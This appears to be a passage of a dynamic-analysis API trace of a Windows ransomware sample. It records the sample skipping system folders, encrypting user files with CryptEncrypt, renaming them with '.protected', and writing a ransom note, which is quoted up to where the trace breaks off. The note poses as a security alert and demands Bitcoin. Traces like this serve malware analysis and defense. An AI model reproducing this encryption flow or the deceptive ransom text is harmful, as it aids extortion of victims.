lpString2="Windows") returned -1 [0091.697] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0091.697] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0091.697] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.697] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.697] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\.") returned 45 [0091.697] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.697] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0091.697] lstrcmpW (lpString1=".", 
lpString2="RESTORE_FILES.txt") returned -1 [0091.697] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.697] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.698] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.698] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.698] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.698] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0091.698] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0091.698] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.698] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.698] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\..") returned 46 [0091.698] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.698] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.698] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0091.698] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0091.698] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.698] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.698] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.698] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.698] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0091.698] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0091.698] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0091.698] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0091.698] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0091.698] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini") returned 55 [0091.700] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0091.700] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0091.700] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.700] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.701] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.701] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini") returned 55 [0091.701] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 
0x0 [0091.701] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini") returned 55 [0091.701] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0091.701] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini") returned 55 [0091.701] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0091.701] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x192, lpOverlapped=0x0) returned 1 [0091.702] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffe6e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.702] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x192, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x192, lpOverlapped=0x0) returned 1 [0091.702] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.702] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.702] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.702] CloseHandle (hObject=0xb4) returned 1 [0091.703] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini.protected") returned 65 [0091.703] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\favorites\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\desktop.ini.protected")) returned 1 [0091.704] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.704] lstrcmpiW (lpString1="Links", lpString2="Windows") returned -1 [0091.704] lstrcmpiW (lpString1="Links", lpString2="Program Files") returned -1 [0091.704] lstrcmpiW (lpString1="Links", lpString2="Program Files (x86)") returned -1 [0091.704] lstrcmpiW (lpString1="Links", lpString2="$Recycle.bin") returned 1 [0091.704] lstrcmpiW (lpString1="Links", lpString2="System Volume Information") returned -1 [0091.704] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links") returned 49 [0091.704] lstrcmpW (lpString1="Links", lpString2=".") returned 1 [0091.704] lstrcmpW (lpString1="Links", lpString2="..") returned 1 [0091.704] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*") returned 51 [0091.704] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0091.705] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.705] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0091.705] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0091.705] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.705] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.705] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\.") returned 51 [0091.705] lstrcmpW (lpString1=".", lpString2=".") 
returned 0 [0091.705] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0091.705] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0091.705] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.705] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.705] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.705] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.705] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.705] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0091.705] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0091.705] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.705] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.705] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\..") returned 52 [0091.705] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.705] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.705] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0091.705] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0091.705] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.705] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, 
pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.705] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.706] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.706] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0091.706] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0091.706] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0091.706] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0091.706] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0091.706] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini") returned 61 [0091.706] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0091.706] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0091.706] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.706] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.706] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 
[0091.707] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini") returned 61 [0091.707] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0091.707] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini") returned 61 [0091.707] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0091.707] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini") returned 61 [0091.707] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0091.707] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x50, lpOverlapped=0x0) returned 1 [0091.708] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffffb0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.708] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x50, lpOverlapped=0x0) returned 1 [0091.708] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.708] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.708] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.708] CloseHandle (hObject=0xd4) returned 1 [0091.709] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Favorites\\Links\\desktop.ini.protected") returned 71 [0091.709] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\desktop.ini.protected")) returned 1 [0091.769] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.769] lstrcmpiW (lpString1="Suggested Sites.url", lpString2="Windows") returned -1 [0091.769] lstrcmpiW (lpString1="Suggested Sites.url", lpString2="Program Files") returned 1 [0091.769] lstrcmpiW (lpString1="Suggested Sites.url", lpString2="Program Files (x86)") returned 1 [0091.769] lstrcmpiW (lpString1="Suggested Sites.url", lpString2="$Recycle.bin") returned 1 [0091.769] lstrcmpiW (lpString1="Suggested Sites.url", lpString2="System Volume Information") returned -1 [0091.769] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url") returned 69 [0091.769] StrStrIW (lpFirst="Suggested Sites.url", lpSrch=".protected") returned 0x0 [0091.769] lstrcmpW (lpString1="Suggested Sites.url", lpString2="RESTORE_FILES.txt") returned 1 [0091.769] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.769] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.769] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 
lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.770] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url") returned 69 [0091.770] StrStrW (lpFirst="Suggested Sites.url", lpSrch=".txt") returned 0x0 [0091.770] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url") returned 69 [0091.770] StrStrW (lpFirst="Suggested Sites.url", lpSrch=".rar") returned 0x0 [0091.770] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url") returned 69 [0091.770] StrStrW (lpFirst="Suggested Sites.url", lpSrch=".zip") returned 0x0 [0091.770] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0xec, lpOverlapped=0x0) returned 1 [0091.771] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff14, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.771] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0xec, lpOverlapped=0x0) returned 1 [0091.772] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.772] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.772] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.772] CloseHandle (hObject=0xd4) 
returned 1 [0091.773] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url.protected") returned 79 [0091.773] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url.protected")) returned 1 [0091.774] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.774] lstrcmpiW (lpString1="Web Slice Gallery.url", lpString2="Windows") returned -1 [0091.774] lstrcmpiW (lpString1="Web Slice Gallery.url", lpString2="Program Files") returned 1 [0091.774] lstrcmpiW (lpString1="Web Slice Gallery.url", lpString2="Program Files (x86)") returned 1 [0091.774] lstrcmpiW (lpString1="Web Slice Gallery.url", lpString2="$Recycle.bin") returned 1 [0091.774] lstrcmpiW (lpString1="Web Slice Gallery.url", lpString2="System Volume Information") returned 1 [0091.774] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url") returned 71 [0091.774] StrStrIW (lpFirst="Web Slice Gallery.url", lpSrch=".protected") returned 0x0 [0091.774] lstrcmpW (lpString1="Web Slice Gallery.url", lpString2="RESTORE_FILES.txt") returned 1 [0091.774] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.774] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.774] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.776] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url") returned 71 [0091.776] StrStrW (lpFirst="Web Slice Gallery.url", lpSrch=".txt") returned 0x0 [0091.776] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url") returned 71 [0091.776] StrStrW (lpFirst="Web Slice Gallery.url", lpSrch=".rar") returned 0x0 [0091.776] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url") returned 71 [0091.776] StrStrW (lpFirst="Web Slice Gallery.url", lpSrch=".zip") returned 0x0 [0091.776] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0xe2, lpOverlapped=0x0) returned 1 [0091.777] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff1e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.777] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0xe2, lpOverlapped=0x0) returned 1 [0091.778] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.778] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.778] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, 
nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.778] CloseHandle (hObject=0xd4) returned 1 [0091.779] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url.protected") returned 81 [0091.779] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url.protected")) returned 1 [0091.780] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0091.780] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0091.780] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\RESTORE_FILES.txt") returned 67 [0091.780] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.780] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour 